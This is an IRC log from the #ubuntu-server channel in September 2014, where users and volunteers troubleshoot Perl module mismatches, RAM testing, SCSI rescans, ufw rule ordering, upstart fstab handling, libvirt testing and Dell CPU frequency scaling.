<Valduare> sarnold next roadblock Perl API version v5.14.0 of Socket does not match v5.18.0 at /usr/share/perl/5.18/XSLoader.pm line 92.
<sarnold> Valduare: dang, that one's harder. Socket.pm from perl-base should report v5.18.0 .. and Socket.pm from e.g. libsocket-perl isn't installed on my laptop, seems unlikely to be the package that you need to upgrade..
<Valduare> hmm
<sarnold> Valduare: hrm, now that I look into a bit .. why 5.18 and not 5.18.2??
<sarnold> Valduare: ... did you say "yes" to CPAN's offer to install a new perl interpreter or something similar? :)
<Valduare> havnt used cpan
<sarnold> good good, that always drove me up the wall
<sarnold> but still, that's the craziest..
<Valduare> this is a 12.04 system freshly upgraded to 14.04 if that helps
<Valduare> had the grub issue on first boot
<Valduare> had to use boot-rescue
<sarnold> you may be able to better understand my confusion .. well, eventually .. if you take a look at the publishing history here: https://launchpad.net/ubuntu/+source/perl/+publishinghistory
<sarnold> I just don't see a 5.18 or 5.18.0 package in the list.
<Valduare> btw I wonder how the MaaS guys are doing
<Valduare> hear of any progress with maas and arm devices?
<sarnold> Valduare: hmm, no, I haven't, all my maas use has been x86 (well, virtualized x86 at that..)
<ikonia> eagles0513875: look in the config file - that will show you all the redirects
<Valduare> ah how does it work for virtualized stuff
<ikonia> eagles0513875: the ones that won't be shown are ones that are handled by the application, not the webserver
<sarnold> Valduare: they've got #maas -- it might be worth poking your head in if you're curious :)
<eagles0513875> you mean the global apache configuration ikonia
<sarnold> Valduare: well, it worked well enough for my testing -- it might not be something you'd actually want to -use- of course
<Valduare> I have a cobbled together setup here lol
<Valduare> freenas box serving iscsi to a gigabyte gae350n mobo with 16 gigis of ram running esxi atm and another host box an old dell optiplex 745 running esxi as well  all with ubuntu vmâs
<sarnold> ooh fun :)
<sarnold> does the esxi do all the iscsi itself or do your VMs do the iscsi initiating?
<Valduare> it handles it
<Valduare> vmâs just act like vms if they were on virtualbox even
<sarnold> I've heard linux's iscsi target is .. not great. It might be best to have esxi do it :)
<Valduare> I am interested in other solutions eventually
<Valduare> so far this setup has been fairly thoughtless
<Valduare> I use smoothwall 3   as a virtual router
<user123321> sarnold, where are the logs from " l m d w" going to save?
<Valduare> so make a vm, install smoothwall 3 on there just 128 megs of ram or so. then give it two virtual nics one for the public ip and one for internal traffic
<eagles0513875> ikonia: reason i asked that I have round cube installed and something has changed where its redirecting to the main website instead of roundcube login page
<eagles0513875> i followed https://help.ubuntu.com/community/Roundcube
<sarnold> user123321: syslog -- you may need to change the "log level" if they don't get saved there..
<eagles0513875> to set it up and it worked
<user123321> cool
<sarnold> Valduare: ha :)
<Valduare> then I pile as many vmâs as I want behind each smoothwall router lol
<ikonia> eagles0513875: it's possible your upgrade to 14.04 and thus apache 2.4 has changed the way it's redirection works
<ikonia> eagles0513875: first thing is the redirection apache or the application
<eagles0513875> wont be suprised there.
<eagles0513875> i think there as well were config issues with round cube after the upgrade im working around them bit by bit
<ikonia> is the redirect the webserver or the application ?
<eagles0513875> application
<ikonia> eagles0513875: then it's unlilkley the webserver has anything to do with it
<eagles0513875> im looking in htaccess
<ikonia> does htaccess do redirects for you ?
<eagles0513875> in this case it did ikonia :) now just have to fix imap issue
<lordievader> Good morning.
<salih-emin> good morning
<cfhowlett> lordievader, ehhh, no.  afternoon in Beijing.  How about "greetings!"
<lordievader> Hey salih-emin, how are you?
<lordievader> cfhowlett: Good afternoon to you then ;) How are you doing?
<salih-emin> fine thanks !
<cfhowlett> lordievader, no complaints
<lordievader> salih-emin, cfhowlett: Good to hear :)
<eagles0513875> hey lordievader
<eagles0513875> hows it going
<lordievader> eagles0513875: Pretty good here ;)
<lordievader> How are you eagles0513875 ?
<eagles0513875> not bad chugging along getting things donw
<eagles0513875> done
<user123321> Machine got frozen again during boot with nothing on screen. Kernel log from the start of boot to the emergency restart: http://pastebin.com/A5V8yWjS
<user123321> Any ideas? Thanks :)
<lordievader> user123321: Run memtest: Corrupted low memory at ffff880000006598 (6598 phys)
<user123321> lordievader, shall I just run memtest in terminal?
<lordievader> user123321: No, reboot and select memtest from the grub menu.
<user123321> Ah ok,
<user123321> brb
<user123321> lordievader, machine froze two consecutive times when trying recovery mode. I'm back with normal boot now *sigh*
<salih-emin> do you have a bootable media ?
<salih-emin> you can try memtest from a live media
<user123321> salih-emin, I could prepare a bootable media. Just to avoid confusion, is memtest supposed to be used for testing systems that cannot be booted at all? Or can it identify rare crashes that has happened to me? For example, I'm logged in now with the machine.
<salih-emin> user123321, memtest is for testing RAM for corruptions (hardware issues)
<salih-emin> not the actual OS
<user123321> oh I see
<user123321> I'd try it sometime, coz I need to prepare a bootable media.
<salih-emin> yes if you encounter errors during the memtest you should consider replasing your RAM memory
<user123321> salih-emin, But i don't get crashes when I use Windows 7 :|
<user123321> not like this fatal :/
<Andy80> hi, I'm trying to make mcrypt php extension work on my Ubuntu 14.04. I'm aware of this bug https://bugs.launchpad.net/ubuntu/+source/php-mcrypt/+bug/1318021 but even after installing the plugin and checking that is enabled with php5-fpm -m | grep mcrypt still one of my wordpress plugin can't see it. Please not I'm using php5-fpm. Any idea?
<uvirtbot> Launchpad bug 1318021 in php-mcrypt "Not Find mcrypt.ini" [Undecided,Confirmed]
<lordievader> user123321: It could be that the memory corruption is in a place that Windows does not address quickly.
<Andy80> please also note that there is no /etc/php5/conf.d/ directory... there is /etc/php5/fpm/conf.d/
<lordievader> user123321: Also, that the machine freezes upon booting the recovery mode is not a good sign.
<user123321> lordievader, This link is surprising, and what do you think about its response?: https://bbs.archlinux.org/viewtopic.php?id=163440
<user123321> He has the same laptop as mine, DV6
<lordievader> user123321: Ewaller probably knows what he is talking about ;)
<user123321> haha
<caribou> jamespage: has anything (i.e. SRU like) has been planned to take charm fixes from ./next into the existing stable release ?
<caribou> jamespage: your document states the reason why it should be done, then stops there
<jamespage> caribou, nope - each fix would be assessed on a requirement and impact basis via a bug
<jamespage> if you have fixes you want to see in the stable charms, they feel free to nominate stuff
<caribou> jamespage: what if the fix is already coming from a bug ?
<jamespage> caribou, not sure I understand your question then
<caribou> jamespage: I'm thinking of the known_hosts/authorized_keys fix I did for nova-cloud-controller/nova-compute charms
<jamespage> caribou, the change needs to be merged into /next and then proposed/merged into the trunk branch
<caribou> jamespage: this fix is already into ./next (nova_cc one)
<jamespage> ok
<caribou> jamespage: TL;DR : what do I need to do to get those fixes which are in ./next in the official charm :-)
<jamespage> caribou, cherry pick the commit from the next branch into the stable branch and propose it
<caribou> jamespage: k
<abhishek> how can i scan new hard-drive without rebooting ?
<ikonia> abhishek: did it get detected as a udev event ?
<abhishek> udev event ? u r talking about udev at startup
<ikonia> udev will create the device node used to access it
<ikonia> if you don't see a udev event (eg: your hardware does not support hot plug) you can't access it
<ikonia> you could try triggering udev, but it's unlikley to do anything if you don't have hotplug support
<abhishek> how can i do this ?
<ikonia> does your hardware have hotplug support ?
<abhishek> may be I don't know ? I just created a lun in storage want to add in ubuntu-serrver
<abhishek> I cant reboot this server this time
<ikonia> lun in storage ?
<ikonia> so this is a fibre array ?
<abhishek> yes
<ikonia> ok, you need to walk the fibre
<ikonia> and it shoul trigger a udev event
<dasjoe> abhishek: find out how many scsi hosts your system has, then something like this: for x in $(seq 0 7); do echo "- - - " > /sys/class/scsi_host/host$x/scan; done
<ikonia> you send a "1" to an option in proc
<abhishek> let me try this
<abhishek> I have four scsci host
<abhishek> this works thank u dasjoe and ikonia :)
<abhishek> thank u very much
<caribou> sorry for the dumb question, but where do the stable openstack charms live (for precise) these days ?
<caribou> I used to pick them at lp:charms/{nova-cloud-controller|nova-compute} a while back
<jrwren> how do I use uvt-kvm to test utopic? uvt-simplestreams-libvirt query release=utopic returns nothing
<jamespage> caribou, either lp:charms/<charm-name> or lp:charms/trusty/<charm-name>
<jamespage> we keep the branche sin sync
<caribou> jamespage: good, those are the ones I was expecting
<caribou> jamespage: thanks
<rbasak> jrwren: uvt-simplestreams-libvirt sync --source http://cloud-images.ubuntu.com/daily release=utopic arch=amd64
<rbasak> jrwren: daily images don't get published in the released streams, except for alpha/beta etc.
<jrwren> thanks rbasak
<zul> hallyn: http://people.canonical.com/~chucks/libvirt/
<hallyn> zul: ok, will get to that today
<zul> hallyn: ack
<user123321> sorry my internet was reset, did anyone say anything related to my system crash after I logged out?
<Guest47177> jdstrand: I was here asking about UFW changes between Precise and Trusty: turns out it was not related to firewall at all.  two other issues conspired to make us think thep problem was firewall related
<Guest47177> first issue: we were rebooting like this: reboot now
<Guest47177> second issue: NFS mount was hanging boot
<Guest47177> this explains our first issue: http://askubuntu.com/questions/483670/what-causes-ssh-problems-after-rebooting-a-14-04-server
<user123321> Is upgrading the linux kernel to a newer version than the official ubuntu released advisable?
<user123321> release*
<jdstrand> Guest47177: oh, interesting
<lordievader> user123321: No.
<Guest47177> so the machines weren't actually rebooting, and when we rebooted them via the EC2 console they'd hang on boot waiting for NFS mount
<jdstrand> ah
<cfhowlett> user123321, for the vast majority - inadvisable. BUT if you have the expertise ....
<jdstrand> very interesting
<jdstrand> Guest47177: thanks for the update! :)
<Guest47177> yep, didn't want to let that hang out there w/o explanation
<user123321> Oh ok, because I got an advice from #linux to upgrade the kernel to check if it might solve my crash issues :D (crashes that result from possibly firmware bugs in my DV6 laptop)
<lordievader> user123321: Have you already checked the memory?
<user123321> lordievader, no bootable media yet :/
<lordievader> user123321: Check that first. A new kernel will not fix hardware issues.
<user123321> Oh, I thought a new kernel could "ignore" hardware issues ;)
<user123321> like Windows does. :|
<bananapie> if I type 'cat /dev/zero > /dev/null & ' in bash, how many file descriptors did I just open ?
<bananapie> it seems to me it would open 5, stdin, stdout, stderr as well as /dev/zero and /dev/null
<sarnold> bananapie: iirc bash hands out more filedescriptors to processes; best check /proc/pid/fd/
<bananapie> So, if I do a while [ true ] ; loop with the above code, I should get errors about to many processes open pretty quickly ?
<sarnold> bananapie: check ulimit -a to see your limits; my max user processes limit is 125759 -- enough to make the system mighty unhappy
<bananapie> ulimit -a says 1024, but I have a  process open with 1500 descriptors. it's not getting any errors.
<bananapie> It's running as root, is it possible that root is not ulimited ?
<sarnold> bananapie: the nproc limit is applied per-user... the filedescriptor limit is applied per-process. none of your processes will have more than a handful of descriptors open.
<bananapie> ok
<bananapie> is a process and a thread different ?
<sarnold> and yeah root isn't subject to the rlimits in the first place -- that's CAP_SYS_ADMIN and CAP_SYS_RESOURCE
<sarnold> bananapie: that's complicated :)
<bananapie> :P
<bananapie> ok. But if a process is running as root, it can open 10,000 files and ulimit doesn't care. Only the sysctl file limit right ?
<sarnold> cap_sys_admin means even /proc/sys/fs/file-max can be ignored
<bananapie> Cool.
<bananapie> also, brb. I have to go uncrash a server
<sarnold> happy uncrashing :)
<bananapie> I think I'll just reboot it. The servers is on it's knees right now. I looped 1000 times only. It's not a very powerful machine.
<sarnold> hahahaha
<sarnold> good luck with the reboot :)
<bananapie> pkill cat :)
#ubuntu-server 2014-09-04
<LeMike> hi there. I just wrote a plugin for nagios and wait for the mail. there should be one. how can I test my new plugin?
<Cactusbiter> Hey
<Cactusbiter> Can we circlejerk about mynt for a bit?
<Cactusbiter> It's been a while
<sveinse> I have a 14.04 amd64 server running on a vmware datacenter. It runs kernel 3.10.0-35 based on the linux-image-virtual. We have problems with the server running *extremely* slow when doing our builds and have thus been debugging this from the datacenter side. The server runs much, much slower than a 12.04 cousin running on the same host, doing the same things. Is there anyone here that have...
<sveinse> ...experience similar things?
<sveinse> Particularly running qemu processes (qemu-arm-static in our case) seems very slow
<rbasak> sveinse: on the surface that sounds like a kernel regression. Maybe try some other kernels? #ubuntu-kernel might be helpful too.
<sveinse> rbasak: I'll try an older kernel
<lynxman> rbasak: hey o/
<rbasak> lynxman: hello! Long time. How's it going?
<lynxman> rbasak: very well sir, still hanging around here, idling most of the time ;)
<[1]Az> hey guys
<[1]Az> whats the best way of setting up a repo so i can test updates before deploying them?
<cfhowlett> [1]Az, virtualization
<[1]Az> erm
<[1]Az> i meant more in a whats the software package and config settings kind of way :P
<[1]Az> my google fu is too weak to turn up what im looking for
<lordievader> [1]Az: Reprepro is a nice tool for maintaining a repo.
<[1]Az> this looks sweet
<[1]Az> thanks man
<Tazmain> Hi all if I have set ufw to deny an ip why does the auth logs still show that ip connecting ? Is that just the firewall logging it or did my entry not take effect yet >
<jdstrand> Tazmain: a) ufw uses connection tracking so it won't clock existing connections and b) rules are order sensitive. the deny rule should come before other allow rules that would otherwise let it in
<Tazmain> jdstrand, if the connection that keeps coming in is against ssh where it gets denied wouldn't that be a new connection with the retry ?
<jdstrand> Tazmain: yes, which is where you'd want to verify rule ordering
<Tazmain> Need to change it, it seems
<Tazmain> rule 12 is bad
<btorch> anyone here using dell r720s with precise and srvadmin tools ?
<hallyn> zul: what problem did you have with the add-cgmanager patch in libvirt 1.2.8?  the unapplied patch had all but the configure part removed, but when i copied the utopic version back in it applied with just a shift, and compiled cleanly.  (wondering if i did something wrong :)
<hallyn> btw, storms, may be losing power / soon
<hallyn> (in which case, biab)
<zul> hallyn: i could have done something wrong
<hallyn> ok, qrt running, lessee how it goes then i'll look at the diffs for all the files that patch touches
<hallyn> zul: where is the corresponding python-libvirt source?
<hallyn> (i've never even looked at how you make that)
<hallyn> spose i can just build my own
<hallyn> zul: eerror: Failed to connect socket to '/home/tgrBozzk/.cache/libvirt/libvirt-sock': No such file or directory
<hallyn> is there a change you know of in libvirt tha taccounts for this?
<zul> hallyn,  not that i know
<sudormrf> have a question for you guys, I think the answer is yes, but just want to verify.
<hallyn> sigh, refetching the qrt tree.  sometimes that fixes weird issues like this :(
<sudormrf> so the question is this.  I am going to install a DE on my NUC server for XBMC.  I am going to create an XBMC user that has standard access rights and will autologin to the DE.  my question is, suppose I have something like btsync running currently (xbmc user does not exist) with user A.  If I have this DE going and getting logged in to by the XBMC user, will the btsync program still run as the different user?  btsync is daemonized.
<hallyn> what is a DE
<cfhowlett> hallyn, desktop environment = unity
<hallyn> ok.  well if btsync is running from an upstart job, you can just make sure it runs as the righ tuser there.
<hallyn> (iow i don't know, you should be able to make it do what you want, i've never used btsync or xbmc :)
<sudormrf> I won't be installing unity, but yeah.  just want to make sure things like nagios and some of the other stuff it is currently doing would not be impacted.  these are all "services" that are either running as root or running as user A (not sure what the right term to use.  I can type service X start/stop/restart/etc) so I was thinking there shouldn't be an issue, just wanted to verify.
<hallyn> yup shouldn't be a prob
<sudormrf> hallyn, thanks :)
<hallyn> zul: jdstrand: all right now these qrt failures are starting to piss me off.  maybe it's actually the kernel.  trying some more update variations
<zul> hallyn: which python version are you using?
<hallyn> a home-made 1.2.8-0ubuntu1
<hallyn> but i'm also having problems with 1.2.6.  but that sometimes works.  sometimes not.
<hallyn> trying now with 1.2.6-0ubuntu5
<hallyn> (but without rebooting for new kernel)
<hallyn> hm, there's no matching python-libvirt for libvirt-bin in utopic right now?
<hallyn> so then i have no idea why my last run failed (with 1.2.6-0ubuntu1)
<hallyn> when it previously succeeded in another identical vm (both snapshotted from same lvm parent)
<hallyn> d'oh, wrong window
<hallyn> retrying :)
<miceiken> Hey. So I have a Ubuntu server running SSH with key authentication. That is set up and working fine, and I'm able to log in from my desktop (Windows). However, I set up a new desktop with Ubuntu on it, also CLI, how do I add the ssh key to this one so that I can log in from there as well?
<sarnold> miceiken: ssh-keygen a new key on your new desktop, ssh-copy-id to copy the public portion into the authorized_keys on your homedir on the server
<miceiken> thanks sarnold, that did it :)
<zartoosh> hi I am using ubuntu 14.04, I need to develop a daemon to monitor some of the processes and if they die to log and restart the processes. I was wondering if there is already a utility available which I can use? thx
<sarnold> zartoosh: the run-one package includes a run-one-constantly utility that might be useful
<zartoosh> sarnold, thanks I have never heard of that.
<sarnold> zartoosh: daemontools and runit are other choices, and the linux-ha project has some very nice tools for making real high-availability systems
<zartoosh> sarnold, oh great thanks so much.
<kriskropd> i need help, 'sudo apt-get install php5-mcrypt' doesn't seem to really install mcrypt - i dont know what it does, but magento installer doesn't see it and phpinfo(); only displays the author names but not the actual version info for mcrypt or anything
<qman__> kriskropd: you may need to restart apache after doing so for it to take effect
<kriskropd> qman__: well, I did that earlier as soon as I installed, but it wasn't adequate enuf
<kriskropd> i think i might reboot the whole server in am minute to see if maybe something else needs restarting - its a development vm so i can afford it
<DieMilchMachts> hi.
<DieMilchMachts> im running an nginx server with the user www-data
<DieMilchMachts> now i want to acess the /var/www folder via my username (pi) but i have no write permission
<DieMilchMachts> so i tried sudo useradd -a -G www-data pi to add myself to the www-group
<DieMilchMachts> when I type "id pi" i see, that I am in the right group
<DieMilchMachts> but I still have no write permission to the files
<DieMilchMachts> any ideas how to fix them?
<hallyn> jdstrand: so I notice you just commented that test-libvirt.py from qrt passes all tests for you.  that's on a utopic system, this week?
<jdstrand> I did?
<hallyn> heh
<jdstrand> I have not run that for ages :)
<hallyn> in the dbus apparmor bug
<jdstrand> oh the FFe?
<hallyn> yeah
<hallyn> oh that's trusty?
<hallyn> no, ffe
<jdstrand> no, I was hasty on that DONE
<jdstrand> no, utopic
<jdstrand> but I am only going to care if it runs the same
<jdstrand> (also, that ffe hasn't been given to the release team yet)
<hallyn> ok, i wasn't looking to critise, i'm looking ot regain my sanity :)
<jdstrand> yeah, I haven't run it yet. I will tomorrow. I have tested it quite a bit but not with wrt
<hallyn> wrt?
<jdstrand> qrt
<hallyn> ok, thanks, i'll try a few more permutations tonight, but i really don't know what's going on with the failures i'm getting, so look forward to seeing if it works for you
<hallyn> thanks - gnight
<jdstrand> how did you know I needed a nap?
<jdstrand> hallyn: g'night :)
<hallyn> hm, what is apparmor perm 'c'
<jdstrand> creat()
<jdstrand> you need 'w'
<hallyn> cool, we have 'w', so he's messing something up - thx
<jdstrand> np
<sarnold> hallyn: I used 'uvt update' to update my VMs, and one of them now has a corrupted qcow2 image. rebooting my thinkpad still won't let me boot the image: http://paste.ubuntu.com/8254455/
<linuxgeek_> hi, on 13.10 server 64 bit with virtualization enabled in the server bios and kvm-ok says ok
<linuxgeek_> when i do a apt-get install kvm
<linuxgeek_> it says note selecting 'qemu-system-x86' instead of 'kvm'
<linuxgeek_> why it does not install kvm?
#ubuntu-server 2014-09-05
<TJ-> linuxgeek_: qemu and kvm projects merged; kvm package is just virtual now
<linuxgeek_> ah cool TJ-
<TJ-> linuxgeek_: kvm only maintained a separate userspace whilst qemu didn't support the Kernel Virtual Machine
<hallyn> sarnold: and what version of qemu are you running?
<hallyn> rharper: ^ dunno if you're keeping track
<hallyn> so on trusty, qrt gives no failures.  build utopic's libvirt on trusty, 1 failure.  built utopic's virtinst, 2 failures.
<hallyn> got a few more to track down
<sarnold> linuxgeek_: yikes, note 13.10 reached the end of its life in july
<Patrickdk> heh? stay on a security updated branch? what? :)
<sarnold> hallyn: 2.0.0+dfsg-2ubuntu1.2
<hallyn> oh, was hoping you were using one of the bisect kernels
<hallyn> uh, qemus
<sarnold> hallyn: no, I hadn't done any testing yet :(
<hallyn> just being greedy
<pixels> When trying to run "sudo apt-get install git-core" I get this error "E: Package 'git-core' has no installation candidate", help, please?
<pixels> I'm on Ubuntu 12.04.5 LTS
<sarnold> pixels: juju-core is only available in a PPA for 12.04 LTS
<pixels> juju-core?
<sarnold> sigh
<sarnold> pixels: don't mind me, it's obvious I shouldn't be ehind a keyboard any longer
<pixels> also add-apt-repository gives me a command not found
<sarnold> pixels: try apt-get update && apt-get install git-core  -- perhaps your lists just need refreshing
<pixels> getting a ton of Hash Sum mismatch
<pixels> and it still doesn't work
<sarnold> pixels: which mirror did you get? perhaps it is broken ..
<pixels> us.archive.ubuntu.com
<sarnold> pixels: try sudo netstat -tnp | grep TIME_WAIT -- perhaps you can find which IP address was used
<sarnold> if none look right or if they've moved out, try the apt-get update again
<sarnold> pixels: .. and check dmesg to make sure you're not getting hard drive errors. that can happen.
<TJ-> pixels: Is your system behind a captive portal?
<pixels> sarnold: doesn't show anything
<pixels> and i'm using a VM
<sarnold> pixels: okay, re-run the apt-get update  and while it's running, check netstat -tnp | grep http
<pixels> how would i go about that?
<pixels> i'm using a linux host so ctrl-alt-f2 won't work
<Patrickdk> heh? what does control-alt-f2 do?
<pixels> switches to a different tty
<Patrickdk> no
<Patrickdk> alt-f2/alt-f3/...
<sarnold> pixels: screen or tmux are handy
<pixels> Patrickdk: what
<pixels> can you be a little more clear
<Patrickdk> control is never used to switch tty's
<Patrickdk> or really, vty's
<pixels> it's what i use
<sarnold> the control is only necessary if you're running X, which is usually unlikely on servers :)
<pixels> ah i see
<pixels> 91.189.91.13 91.189.88.153
<sarnold> thanks
<pixels> also i figured out where i can get a zip file for the git repo but i'm still willing to troubleshoot
<sarnold> pixels: okay, probably the 'best' thing to do is add some new repositorys to your APT configuration, hopefully another mirror will work alright
 * Patrickdk wonders
 * Patrickdk just found fiberstore
<sarnold> pixels: try adding a new file to /etc/apt/sources.list.d/temporary.list   http://paste.ubuntu.com/8254869/
<Patrickdk> had the spf+ I needed, and they are a pain to track down
<Patrickdk> ordered some cables too, see how they work
<sarnold> Patrickdk: heh, cable weight, "kg/km"
<Patrickdk> :)
<jsonperl> I've had a server thrashing and saw this when "last reboot"
<jsonperl> reboot	system boot	3.0.57-rescue-x8	Thu Sept	4 08:43 - 08:43   (00:00)
<jsonperl> is that recovery mode?
<hallyn> zul: hey, so i pushed one more (trivial apparmor) fix onto the libvirt package and pushed it to ppa:serge-hallyn/virt for a test-run
<darklessness> sssss
<lordievader> Good morning.
<salih-emin> good morning to all
<lordievader> Hey salih-emin, how are you?
<salih-emin> I should I be ? ITs FRIIIIIDDDAAAAAYYY !!! :P LOLOLO
<salih-emin> How*
<geoff1000> chaps, I'm having an issue with Rancid, has anyone successfully suffered with it?
<DarkStar1> CAn someone help me with vsftpd please. I thought I'd change the  umask so that all uploaded files have group rwx perms (since I can't seem to find any text that says how to change the owner of the file from the ftp user) but it hasn't changed
<DarkStar1> all uploaded files still have the 600 perms
<DarkStar1> s/rw/rwx
<Abhijit> i have 8 disks. sda to sdh. i want 200MB, , 20GB and <remaining_space> these 3 partitions on *each* disk. then i want to create md0 for all eight 200mb partions. mount /boot on md0. then creaet md1 for all eight 20GB partitions. mount / on it. is this the correct recipe for this raid1 setup http://paste.fedoraproject.org/131210/99128401/
<psih0man> hello! I have a deployable ubuntu-server 14.04 image for servers and it contains a fstab entry that doesn't exist on all systems (and I used "nofail" as mount option), so upstart prompts me to type S to mark all filesystems as mounted. how do I tell upstart to skip the fstab entry if the device does not exist?
<cynicallemon> psih0man: why not just get rid of the rogue entry on the affected server?
<psih0man> because I don't ant to
<psih0man> because I don't want to
<psih0man> I want it skipped
<lordievader> psih0man: Give it the option noauto?
<psih0man> cynicallemon: it's not just one server and I don't wat to customise the image for each and every case
<psih0man> lordievader: on systems that have the device, I want it mounted automatically
<cfhowlett> psih0man, sounds legit ...
<psih0man> the entry is "LABEL=ext-array1 /ext-array auto nofail 0 2
<psih0man> "
<psih0man> the entry is "LABEL=ext-array1 /ext-array1 auto nofail 0 2"
<cynicallemon> psih0man: why not deploy the image then ssh into the server and delete entry - unless you have a thousand servers that is
<psih0man> cynicallemon: and if I have thousends of servers what do I do?
<cynicallemon> psih0man: do you?
<psih0man> cynicallemon: I do
<psih0man> that's why I administer servers not a desktop :)
<cynicallemon> then you should be looking at something like puppet maybe
<psih0man> cynicallemon: and what should I tell puppet? that I have some servers that need some custom setting? why doesn't upstart honor nofail?
<psih0man> it's my decision that it should not fail on error
<psih0man> I already use puppet
<cynicallemon> psih0man: you should be asking the devs, not me
<psih0man> but puppet-ing something looks like a hack around a bug
<cynicallemon> well upstart will be making way for systemd before long so you may have to find an alternative way anyway
<rbasak> psih0man: I think that upstart can't really tell the difference between the device not existing, and the device not having been hotplugged yet.
<rbasak> psih0man: an alternative might be to make it noauto, and to set up a separate upstart job to mount it on "hotplug".
<rbasak> This assumes that you don't need it to boot.
<theToastIsDone> howdy everyone.. got some rkhunter questions... i just got a coupleof messages that are just oneliners that said the following: "Please inspect this machine, because it may be infected."
<theToastIsDone> also, I have tripwire installed on my server.. I've gotten a number of different files added as of late.. I do remember update and upgrading, so that may have something to do with it.. I guess, where do i start when it comes to fixing up all of this?
<ivoks> then, inspect it :)
<theToastIsDone> do you know where the rkhunter logs are by chance?
<cfhowlett> theToastIsDone, you seem to be reading this as "something is brokeded!"  If rkhunter had detected a threat, that alert would have been quite explicit.
<theToastIsDone> ah ok, sounds about right, cause there doesn't seem to be any problems
<theToastIsDone> i appreciate it
<ppetraki> psih0man, you might be able to use autofs. http://linuxconfig.org/automatically-mount-usb-external-drive-with-autofs. when the device is detected it's the same sort of hotplug event as inserting a usb drive
<psih0man> ppetraki: that might be a good idea -- thanks
<ppetraki> psih0man, udev will devine the fslabel from the udev helpers, just run it in debug mode or whatever to profile the device and adjust the example accordingly
<ppetraki> s/devine/divine : drinks turboshot
<psih0man> ppetraki: I was thinking of creating an upstart service (which is not a good idea since Ubuntu will be moving to systemd) to mount things at the end of the boot process. over fstab, a script has the advantage of being able to treat errors and conditional execution of mounts (a Turing complete fstab, if you like)
<psih0man> ppetraki: but autofs seems to be a ready to use solution
<ppetraki> psih0man, yeah autofs is one of those "oh that's there" features that people forget about until you need something slick. Like I'm using it to automount an sshfs on a development node, so it forwards my build sandbox to the node in question automagicaly
<ppetraki> psih0man, and it looks like systemd is integrating it, surprise
<psih0man> ppetraki: yeah... systemd is integrating everything :) I was reading a lot of flame wars on this topic lately - but I don't have yet a position about the issue. I tend to agree with Lennart. thus, a minimal Linux instalation will consist of only 2 projects: the kernel and systemd. it'll look more like FreeBSD's minimal system where all system essential components are closely bouded together and additional programs are not part of the base system
<Vladimir_> Does SSH always have an encrypted session no matter what?
<cfhowlett> !ssh
<ubottu> SSH is the Secure SHell protocol, see: https://help.ubuntu.com/community/SSH for client usage. PuTTY is an SSH client for Windows; see: http://www.chiark.greenend.org.uk/~sgtatham/putty/ for it's homepage. See also !scp (Secure CoPy) and !sshd (Secure SHell Daemon)
<spiderni1> hi all. We're trying to install ubuntu 12.04 via netboot by using the latest HWE netinstall. We receive a kernel modules mismatch error
<spiderni1> "No kernel modules were found. This is probably due to a mismatch between the kernel version used by this version of the installer and the kernel version available in the archive"
<spiderni1> we have the modules in our repo... do we need to add some special line to the preseed?
<ppetraki> Vladimir_, I would assume so
<Vladimir_> ppetraki: thanks man
<rberg_> and you are 100% sure the kernel and initramfs that tftp is providing is the same version as the modules on the nfsroot?
<rberg_> you know NM I didnt see netboot there
<weeb1e> Nothing more annoying than a box which ignores CPU power governers
<weeb1e> and now I have two such boxes :|
<weeb1e> Dell hardware is absolutely terrible
<weeb1e> I will never buy anything Dell, as long as I live
<psih0man> weeb1e: you can select in its firmware setup "Active power management" or "OS power management" instead if "Maximum performance" which is the default
<psih0man> defaults are never good
<weeb1e> psih0man: All of those have been tried, nothing can stop the CPU scaling down
<weeb1e> No matter what, the CPU scales down to 1.6ghz and screws up my real-time services
<psih0man> ah: you mean you want your CPU to always be at full speed
<weeb1e> Indeed
<psih0man> I was thinking it's the opposite
<weeb1e> OS power management + any governor, including userspace with a set frequency for each core, is completely ignored
<weeb1e> and the cores continue to scale down to 1.6ghz on both these boxes
<weeb1e> Yet all my other boxes work perfectly with a simple performance governor set
<psih0man> what happens if you select "maximum performance" in firmware Setup
<weeb1e> It continues to scale down
<weeb1e> and the bios firmware is the latest
<psih0man> weird...
<dasjoe> weeb1e: how's the CPU's temp?
<LucidGuy> Alright, what do you guys think has gone wrong here, http://paste.ubuntu.com/8259769/
<weeb1e> dasjoe: Fine, this is not CPU throttling
<weeb1e> I can run cpuburn 8 times, and max out all 8 physical cores, with extra turbo boost speed without any thermal throttling
<weeb1e> So the only conclusion is, Dell hard coded their bios firmware to ignore all options and software configuration, and simply scale down no matter what
<weeb1e> and I was lucky enough to get two identical boxes which have this issue
<dasjoe> weeb1e: try adding "processor.ignore_ppc=1" to your kernel command line, it should make the kernel ignore your BIOS's requests
<psih0man> weeb1e: "placebo configuration options": http://www.psmag.com/navigation/nature-and-technology/technology-deception-elevator-crosswalk-programming-robots-lie-89669/
<dasjoe> You can try it by "echo 1 > /sys/module/processor/parameters/ignore_ppc"
<weeb1e> I'll try that now
<weeb1e> dasjoe: Does not help
<weeb1e> I've ever written a custom script to force the kernel to not allow the CPU to enter C states higher than C1
<weeb1e> But the scaling still causes a noticable performance hit
<weeb1e> Without the ability to stop scaling, these boxes are essentially very expensive 1.6Ghz netbooks
<rberg_> weeb1e: have you tried setting the min speed to the max speed? or does it ignore that as well
<weeb1e> rberg_: Of course, it ignores every possible option of configuration
<pixels> have you tried complaining to dell
<weeb1e> The hardware is out of warranty
<dasjoe> weeb1e: Could be weird DSDT stuff, I'd try various settings for acpi_os_name or acpi_osi
<weeb1e> I have no idea about DSDT, but I will do some research when I get a chance
<dasjoe> weeb1e: the arch wiki has some information: https://wiki.archlinux.org/index.php/DSDT
<weeb1e> Compiling a custom kernel for a box I don't have physical access to, would be quite a pain
<weeb1e> Due to the infrastructure hosting these two boxes, I cannot get remote hardware access
<weeb1e> and of course, this may not end up helping at all anyway
<miceiken> This might be an unpopular question, but are there any decent, free, webpanels out there for Ubuntu server administration? That supports popular/large services etc.
<LucidGuy> Alright, what do you guys think has gone wrong here, http://paste.ubuntu.com/8259769/
<ppetraki> LucidGuy, looks like you're (xfs) getting pushed out by page cleanup
<ppetraki> LucidGuy, you didn't do a bunch of fs stuff and then type 'sync' did you?
<LucidGuy> ppetraki, I did not.
<ppetraki> LucidGuy, looks like memory pressure in one form or another, I'd have to look at what kswapd is doing to give a more informed answer. short answer is competition for free pages == lockup
<ppetraki> LucidGuy, buggable, if you can reproduce it
